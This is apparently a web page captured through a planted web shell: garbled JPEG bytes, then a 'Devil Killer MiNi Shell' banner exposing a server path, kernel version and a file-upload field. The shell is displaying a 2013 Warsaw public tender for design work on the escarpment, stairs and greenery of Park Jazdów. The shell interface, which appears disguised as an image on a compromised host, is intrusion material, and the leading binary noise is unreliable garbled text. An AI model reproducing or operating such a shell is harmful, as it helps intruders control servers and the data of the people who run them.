JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130719/285190-N-2013.html

<p class="kh_header"><b>Warszawa: Wykonanie projektów budowlano - wykonawczych: umocnienia skarpy warszawskiej, remontu schodów terenowych wraz z alejkami i infrastrukturą terenową podziemną i DFA parku oraz inwentaryzacją zieleni, projektem gospodarki istniejącej zieleni i projektem zieleni na terenie Parku Jazdów w Warszawie.</b><br>
<b>Numer ogłoszenia: 285190 - 2013; data zamieszczenia: 19.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Terenów  Publicznych , ul. Jezuicka 1/3, 00-281 Warszawa, woj. mazowieckie, tel. 022 5568322, faks 022 5568373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ztp.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów budowlano - wykonawczych: umocnienia skarpy warszawskiej, remontu schodów terenowych wraz z alejkami i infrastrukturą terenową podziemną i DFA parku oraz inwentaryzacją zieleni, projektem gospodarki istniejącej zieleni i projektem zieleni na terenie Parku Jazdów w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
1.Przedmiot zamówienia składa się z 2 części:
1.1. Pierwsza (1) część obejmuje usługę wykonania projektu budowlano - wykonawczego umocnienia skarpy warszawskiej zlokalizowanej na terenie Parku Jazdów w Warszawie a także w przypadku podjęcia decyzji przez Zamawiającego o realizacji robót budowlanych na podstawie projektu, wykonanego przez Wykonawcę, na pisemne żądanie Zamawiającego, w terminie wyznaczonym przez Zamawiającego, pełnienie nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej;
1.2.	 Druga (2) część obejmuje usługę wykonania projektu remontu schodów terenowych wraz z alejkami, infrastrukturą terenową podziemną i DFA parku (drobne formy architektoniczne, oświetlenie parku, przyłącze wodociągowe) oraz inwentaryzacją zieleni, projektem gospodarki istniejącej zieleni i projektem zieleni na terenie Parku Jazdów w Warszawie a także w przypadku podjęcia decyzji przez Zamawiającego o realizacji robót budowlanych na podstawie projektu, wykonanego przez Wykonawcę, na pisemne żądanie Zamawiającego, w terminie wyznaczonym przez Zamawiającego, pełnienie nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej;
 przy czym, Zamawiający dopuszcza składanie ofert częściowych oraz Zamawiający dopuszcza złożenie oferty przez Wykonawcę do jednej lub do wielu części zamówienia.
2.	Uruchomienie zamówienia dotyczącego pełnienia nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej w części 1 i 2 zamówienia może nastąpić nie później niż 31 grudnia 2015 r. i uzależnione będzie od zabezpieczenia przez Zamawiającego w swoim budżecie środków finansowych na ten cel, przy czym wysokość tychże środków stanowić będzie górną granicę wysokości łącznego wynagrodzenia Wykonawcy z tytułu pełnienia nadzoru autorskiego. Przez uruchomienie zamówienia Strony zgodnie rozumieją pisemne wezwanie Wykonawcy przez Zamawiającego do wykonywania czynności nadzoru autorskiego. Zasady i warunki udzielenia oraz pełnienia nadzoru autorskiego określone zostały w §10 wzoru umów stanowiących odpowiednio załączniki nr 9a i 9b do SIWZ.
3.	Przedmiot zamówienia w części 1 obejmuje teren skarpy na odcinku od kładki w rejonie Al. Armii Ludowej do ul. Górnośląskiej a w części 2 obejmuje teren Parku Jazdów położony pomiędzy ul. Armii Ludowej, ul. Myśliwiecką i ul. Górnośląską. 
4.	Zarówno przedmiot zamówienia w części 1 jak i w części 2 położony jest na cz. dz. nr ew. 17/2 z obrębu 5-06-08 w Dzielnicy Śródmieście, i przedstawiony został odpowiednio na poglądowej mapie stanowiącej załącznik nr 10a i 10b do SIWZ.
5.	Teren Parku Jazdów i skarpy znajduje się w granicach obszaru wpisanego do rejestru zabytków decyzją z dnia 17 grudnia 1968r pod nr C-40 - Teren objęty ulicami Al. Ujazdowskie, Agrykola, Myśliwiecka, Piękna - osadnictwo wczesnośredniowieczne i średniowieczne

Szczegółowy zakres przedmiotu zamówienia 
Szczegółowy  zakres projektu dotyczący części 1 i części 2 obejmuje wykonanie:
- projektu budowlano - wykonawczego,
- przedmiaru robót,
- kosztorysu inwestorskiego, 
- specyfikacji technicznej wykonania i odbioru robót,
Ponadto w ramach prac projektowych dotyczących części 1 i części 2 należy dokonać niezbędnych uzgodnień projektu budowlano - wykonawczego koniecznych do zrealizowania robót w terenie, którymi są:
- uzgodnienie Stołecznego Konserwatora Zabytków,
- uzgodnienie Zespołu Uzgodnień Dokumentacji (ZUD).

Zalecenia i uwagi dotyczące przedmiotu zamówienia w części 1 i części 2:
1.	Projekt - budowlano wykonawczy należy wykonać zgodnie z obowiązującymi przepisami 
i opatrzyć go odpowiednimi oświadczeniami sporządzającego i sprawdzającego w sześciu (6) egzemplarzach.
2.	Przedmiar robót należy sporządzić wg wymagań zamawiającego w formie umożliwjającej sporządzenie kosztorysów ofertowych na etapie procedury przetargowej. Przedmiar robót powinien zawierać opisy robót budowlanych w kolejności technologicznej ich wykonania, z podaniem jednostek przedmiarowych robót wynikających z dokumentacji projektowej oraz podstawy do ustalenia cen jednostkowych robót lub nakładów rzeczowych (nr katalogu, tablicy i kolumny) - wg Katalogu nakładów Rzeczowych lub innych podstaw wyceny. Ponadto przedmiar musi zawierać takie kolumny jak: jednostka, ilość jednostek, cenę jednostkową brutto, wartość jednostek brutto. Przedmiar winien być sporządzony w jednym (1) egzemplarzu.
3.	Kosztorys inwestorski winien zostać opracowany na zasadach określonych w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz. 1389) w jednym (1) egzemplarzu
4.	Specyfikację techniczną wykonania i odbioru robót należy sporządzić zgodnie 
z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu  funkcjonalno-użytkowego (Dz. U. Nr 202 poz. 2072 ze zm.) 3 trzech (3) egzemplarzach.
5.	Uzgodnienie ZUD należy dostarczyć w dwóch (2) oryginalnych egzemplarzach natomiast uzgodnienie Stołecznego Konserwatora Zabytków w jednym (1) oryginalnym egzemplarzu.
6.	Dostarczenie części rysunkowej (JPG, PDF) i opisowej projektów w tym także przedmiarów 
i kosztorysów inwestorskich w wersji elektronicznej (np. programy WORD, EXCEL, kosztorysowe NORMA, SEKO) na nośniku CD w jednym (1) egzemplarzu.
7.	Zapewnienie przez Wykonawcę bieżącej współpracy z Zamawiającym w trakcie opracowywania dokumentacji  i uzgodnienie z Zamawiającym wszelkich rozwiązań zaproponowanych przez Wykonawcę.
8.	Zaleca się Wykonawcom zapoznanie się z warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia.
9.	Zamawiający udostępnia dokumentację geologiczno - inżynierską i geotechniczną
skarpy warszawskiej zlokalizowanej na terenie Parku Jazdów w Warszawie - Załącznik 11 do SIWZ.
10.	 Zamawiający posiada warunki techniczne przyłączenia do sieci miejskiej wodociągowej - Załącznik nr 12 do SIWZ.
11.	 Dokumentację projektową należy sporządzić w oparciu o wytyczne do projektu  - 
Załącznik nr 13a do SIWZ (część 1 zamówienia) i 13b do SIWZ (część 2 zamówienia)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium
na okres związania ofertą w wysokości: 
2 500 zł. dla części 1 zamówienia (projekt umocnienia skarpy) 
7 500 zł. dla części 2 zamówienia (projekt remontu schodów).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca w ramach posiadania wiedzy i doświadczenia 
a)	składając ofertę do części 1 zamówienia (projekt umocnienia skarpy):
- wykonał w okresie ostatnich 3 lat przed upływem składania ofert przynajmniej 
2 usługi, odpowiadające swoim rodzajem przedmiotowi zamówienia 
tj.: wykonanie projektu budowlano - wykonawczego  umocnienia skarpy o powierzchni min. 0,5 ha każda  lub/i projektu budowlano - wykonawczego umocnienia wałów przeciwpowodziowych o długości min. 2 km każdy, oraz załączy dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 4 do SIWZ, 
b)	składając ofertę do części 2 zamówienia (projekt remontu schodów i alejek parkowych):
- wykonał w okresie ostatnich 3 lat przed upływem składania ofert: przynajmniej 
1 usługę, odpowiadającą rodzajem przedmiotowi zamówienia tj.: wykonanie projektu budowlano - wykonawczego budowy lub remontu nawierzchni drogowych z elementów betonowych lub/i kamiennych (chodniki, place, ciągi pieszo - jezdne, parkingi, jezdnie) oraz załączy dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 4 do SIWZ, 
- wykonał w okresie ostatnich 3 lat przed upływem składania ofert przynajmniej 
1 usługę, odpowiadającą swoim rodzajem przedmiotowi zamówienia tj.: wykonanie projektu budowlano - wykonawczego budowy, przebudowy, remontu oświetlenia parkowego lub/i ulicznego oraz załączy dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 4 do SIWZ, 
- wykonał w okresie ostatnich 3 lat przed upływem składania ofert przynajmniej 
1 usługę, odpowiadającą swoim rodzajem przedmiotowi zamówienia tj.: wykonanie projektu przyłącza wodociągowego oraz załączy dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 4 do SIWZ,
- wykonał w okresie ostatnich 3 lat przed upływem składania ofert przynajmniej 
1 usługę, odpowiadającą swoim rodzajem przedmiotowi zamówienia tj.: wykonanie inwentaryzacji dendrologicznej drzew i krzewów wraz z projektem gospodarki drzewostanem ze wskazaniem drzew i krzewów do usunięcia oraz wskazaniem zabiegów pielęgnacyjnych na obszarze parków lub innego typu zorganizowanej zieleni wpisanych do rejestru zabytków lub bedącego pod opieką konserwatorską o pow. nie mniejszej niż 3 ha oraz załączy dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca w ramach dysponowania osobami zdolnymi do wykonania zamówienia
a)	dysponuje jedną osobą posiadającą minimum 5 (pięć) lat doświadczenia zawodowego z uprawnieniami do projektowania w specjalności konstrukcyjno - inżynieryjnej w zakresie budowli hydrotechnicznych lub specjalności wodno melioracyjnej - dotyczy części 1 zamówienia (projekt umocnienia skarpy),
b)	dysponuje osobami posiadającymi minimum 5 (pięć) lat doświadczenia zawodowego z uprawnieniami do projektowania bez ograniczeń w specjalności architektonicznej, instalacji elektrycznych i wodociągowych oraz przynajmniej jedną osobą posiadającą wykształcenie w zakresie architektury krajobrazu lub leśnictwa - dotyczy części 2 zamówienia (projekt remontu schodów i alejek parkowych)
c)	dysponuje osobą posiadającymi minimum 5 (pięć) lat doświadczenia zawodowego w projektowaniu  w zakresie architektury krajobrazu, która w ciągu ostatnich 3 lat była członkiem zespołu autorskiego wykonujacego dokumentację projektowa z zakresu architektury krajobrazu dla terenów zieleni wpisanych do rejestru zabytków lub będącego pod opieką konserwatorską - dotyczy części 2 zamówienia (projekt remontu schodów i alejek parkowych)
          Dysponowane osoby należy wykazać wg wzoru, który stanowi załącznik nr 5 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca w ramach wykazania się sytuacją ekonomiczną i finansową osiągnął w okresie ostatnich trzech lat obrotowych a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, przychód ze sprzedaży produktów (dla Wykonawców prowadzących pełną księgowość) lub przychód z działalności (dla Wykonawców niezobowiązanych do sporządzania bilansu) minimum łącznie w ww. okresie 600 000 złotych, według załączonego wzoru, który stanowią załączniki nr 6a lub nr 6b do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty (Formularz ofertowy musi być zgodny w treści ze wzorem formularza ofertowego stanowiącego załącznik nr 1 do SIWZ), muszą być załączone: 
1.	Potwierdzenie wniesienia wadium wg wymagań określonych 
w pkt. 20 - 24 SIWZ;
2.	Pełnomocnictwo określające jego zakres i udzielone (podpisane) przez osoby uprawnione do reprezentacji Wykonawcy - w przypadku, gdy Wykonawcę reprezentuje pełnomocnik;
3.	Pełnomocnictwo do reprezentacji w postępowaniu albo reprezentowanie 
w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego - 
w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia; 
4.	Zobowiązanie do udostępnienia zasobów niezbędnych do wykonania zamówienia w przypadku gdy wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na zasobach innych podmiotów  określonych w pkt 10.6 SIWZ - wzór stanowi załącznik nr 7 do SIWZ.
5.	Wszystkie dokumenty i oświadczenia wymienione w pkt 10 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień Publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące terminu realizacji zamówienia w przypadku jednej z następujących okoliczności:
1)	w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, zagrażającego życiu lub zdrowiu ludzi,
2)	w następstwie wykraczających poza terminy określone w KPA procedur administracyjnych oraz innych terminów formalno-prawnych mających wpływ na terminy realizacji zamówienia,
3)	ujawnienie w trakcie realizacji robót urządzeń podziemnych, elementów instalacji, konstrukcji, których istnienie lub lokalizacja nie wynika z map uzbrojenia uzgodnionych przez ZUD lub dokumentacji projektowej,
4)	wyjątkowo niesprzyjających warunków pogodowych,
5)	działania siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztp.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Jezuicka 1/3, 00-281 Warszawa, pok 6 (IVp.) cena formularza 30 zł. Kwotę należy wpłacić na konto Zamawiającego: ZT P CITI BANK HANDLOWY Warszawa Nr 88103015080000000550890003.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2013 godzina 09:00, miejsce: Warszawa, ul. Jezuicka 1/3; Kancelaria ZTP, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 001 <b>NAZWA:</b> Usługa wykonania projektu budowlano - wykonawczego umocnienia skarpy warszawskiej zlokalizowanej na terenie Parku Jazdów 
w Warszawie a także w przypadku podjęcia decyzji przez Zamawiającego o realizacji robót budowlanych na podstawie projektu, wykonanego przez Wykonawcę, na pisemne żądanie Zamawiającego, w terminie wyznaczonym przez Zamawiającego, pełnienie nadzoru autorskiego w czasie wykonywania prac budowlanych na podstawie opracowanej dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
